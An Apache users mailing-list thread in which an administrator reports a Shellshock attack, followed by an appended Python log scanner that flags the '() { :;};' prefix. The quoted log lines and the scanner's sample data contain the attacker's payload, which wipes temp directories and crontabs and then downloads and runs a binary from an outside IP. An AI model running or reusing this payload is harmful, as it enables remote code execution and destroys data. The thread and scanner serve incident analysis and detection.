httpd-users mailing list archives

From Victor Sterpu <vic...@casnt.ro>
Subject Re: [users@httpd] Security question
Date Fri, 03 Jul 2015 06:16:27 GMT
"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
> I guess that the 200 comes from the fact that apache simply delivered 
> the /index.html page.
> Or did you find that "sc.gif" was transferred and executed?
> Kurt Bremser
> AMOS Austria
> Newton was wrong. There is no gravity. The Earth sucks.
> ------------------------------------------------------------------------
> *From:* Victor Sterpu [victor@casnt.ro]
> *Sent:* Thursday, 2 July 2015 14:29
> *To:* users@httpd.apache.org
> *Subject:* **SPAM?** Re: [users@httpd] Security question [wd-vc]
>
> In the end the attack was successful. The log shows the last command:
> 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
> "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
> -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
> crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
> print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl 
> -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> But I don't know how he launched this script.
> How can I prevent this?
> I was hoping the server would execute only local scripts, is there 
> something I can do to allow only local scripts to be executed?
>
>
> On 02.07.2015 15:13, Yehuda Katz wrote:
>>
>> It is an attempt to exploit a specific configuration. By the fact 
>> that apache returned a 404 (the log line says so), you can see that 
>> the attempt was not successful.
>>
>> - Y
>>
>> Sent from a gizmo with a very small keyboard and hyperactive 
>> autocorrect.
>>
>> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro 
>> <mailto:victor@casnt.ro>> wrote:
>>
>>     Hello
>>
>>     A hacker attacked an apache2 web server by HTTP injection.
>>     The log shows what he has done:
>>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() {
>>     :;};/usr/bin/perl -e 'print \"Content-Type:
>>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl
>>     lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget
>>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>>
>>     How can I prevent this in the future, and how can I reproduce it?
>>     I tried to reproduce it, but it is not clear how he launched this
>>     command, and I want to know so I can test my vulnerabilities in
>>     the future.
>>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>>
>>     Thank you
>>
>>
>
>
> AMOS Austria GmbH
> 1130 Wien, Hietzinger Kai 101-105
> FN 365014k, Handelsgericht Wien
> UID: ATU 66614737
>
> http://www.allianz.at
>
> ********************************************************
> This e-mail and any attachments to it contain information
> that is confidential and intended exclusively for the
> named addressee(s).
> If you are not the named addressee, you may neither make
> this e-mail and any attachments available to other persons
> nor use them in any other way.
> If you are not the intended recipient, we ask you to delete
> this e-mail and all attachments.
>
> Please note: This email and any files transmitted with it is
> intended only for the named recipients and may contain
> confidential and/or privileged information. If you are not the
> intended recipient, please do not read, copy, use or disclose
> the contents of this communication to others and notify the
> sender immediately. Then please delete the email and any
> copies of it. Thank you.
> ******************************************************** 
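The thread's open question is how to tell from the access log whether this kind of request hit the server, and whether the status code says anything about success. The two log lines quoted above both carry the bash function-definition prefix `() { :;};` in the User-Agent field, which is the marker of the function-import bug commonly known as Shellshock; the status code (404 for the CGI path, 200 for `/`) only says whether Apache found a resource to serve, not whether the header was ever handed to a shell. The script below is an added example, not code from the thread or the httpd project: it parses Apache combined-format lines, unescapes the quoted User-Agent, and flags every line whose agent string starts a bash function definition, reporting the status alongside so a defender can triage both cases. The sample lines are constructed from the two log entries quoted in the thread, rejoined onto single lines with the injected command shortened, plus one ordinary request; the regex names and the `find_function_injection` helper are this example's own.

```python
import re

# Apache "combined" format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
# The agent field may contain \" (Apache escapes embedded quotes), so it is
# matched as a run of "anything but a quote or backslash, or a backslash pair".
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# The bash function-definition prefix seen in both log lines of the thread:
# "() { :;};" followed by the command the attacker wants run.
FUNCTION_PREFIX_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')

# Constructed sample: the thread's two entries (injected command shortened)
# and one benign request for contrast.
SAMPLE_LOG = r'''
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif &\");'"
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif &\");'"
198.51.100.7 - - [01/Jul/2015:17:03:10 +0300] "GET /index.html HTTP/1.1" 200 885 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"
'''.strip().splitlines()


def parse_combined(line):
    """Return a dict of the combined-log fields, or None if the line does not parse."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    # Undo Apache's \" escaping so the agent reads as the client sent it.
    rec['agent'] = rec['agent'].replace('\\"', '"')
    return rec


def find_function_injection(lines):
    """Flag every parsable line whose User-Agent begins a bash function definition.

    The status code is reported but not used as a filter: a 404 means Apache
    found nothing to serve at that path, a 200 means it served something; neither
    says whether the header reached a shell, so every hit deserves a look.
    """
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        if FUNCTION_PREFIX_RE.search(rec['agent']):
            hits.append({
                'host': rec['host'],
                'time': rec['time'],
                'request': rec['request'],
                'status': rec['status'],
            })
    return hits


if __name__ == '__main__':
    for hit in find_function_injection(SAMPLE_LOG):
        print(f"{hit['time']} {hit['host']} {hit['request']!r} -> {hit['status']}")
```

Run against a real `access.log` by replacing `SAMPLE_LOG` with the file's lines; a hit on a path that resolves to a CGI script, or on any path once the server has been observed doing what the injected command asks (outbound download, new process), is the case to escalate. The match is on the agent field only because that is where both quoted lines carry the prefix; the same header can arrive in Referer or Cookie, so a production rule should apply `FUNCTION_PREFIX_RE` to every logged header, not just this one.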

